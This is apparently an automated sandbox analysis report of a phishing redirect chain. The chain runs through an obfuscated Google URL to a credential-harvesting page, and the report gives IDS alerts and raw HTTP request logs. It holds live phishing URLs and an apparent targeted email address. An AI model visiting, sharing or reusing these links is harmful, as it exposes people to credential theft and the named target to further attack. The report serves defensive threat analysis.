Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292

Overview

General Information

Sample URL:https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%
Analysis ID:1556121
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Suricata IDS alerts for network traffic
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 1448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1972,i,7630027438406518576,1411224697696924047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T23:38:00.988768+010020566432Possible Social Engineering Attempted192.168.2.449744162.144.0.229443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T23:38:00.026801+010020573331Successful Credential Theft Detected192.168.2.449742162.144.0.229443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.govHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:55138 version: TLS 1.2

Networking

barindex
Source: Network trafficSuricata IDS: 2057333 - Severity 1 - ET PHISHING MAMBA Credential Phish Landing Page 2024-11-08 : 192.168.2.4:49742 -> 162.144.0.229:443
Source: global trafficTCP traffic: 192.168.2.4:49748 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.4:55135 -> 162.159.36.2:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com to https://safetyworksolutions.com/sxzp/7220292368/am9llm5ndxllbkbszwcud2euz292
Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.4:49744 -> 162.144.0.229:443
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/s/safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=TPv5y-1QiVdq91EkX40brbv23a6cppQhqxwXvU-NsLLZJa0j4YDgampZo76tl5yztogKyOz6B4-Yy9rXRi5LdyO8FcNfOjL0iA-gRuEZ8vMldhhUJSw_jl5LR6v1TO6qQSdFRQjy9P8r7Da5pYOe9afI43SDTpAG-gEiAZSASIfTYhmYR1qQFEmqJp_h_UYBrWf57g
Source: global trafficHTTP traffic detected: GET /sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292 HTTP/1.1Host: safetyworksolutions.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: safetyworksolutions.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov HTTP/1.1Host: poonkong.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://safetyworksolutions.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /o/jsdrive.js HTTP/1.1Host: poonkong.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.govAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://poonkong.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://poonkong.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: poonkong.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.govAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
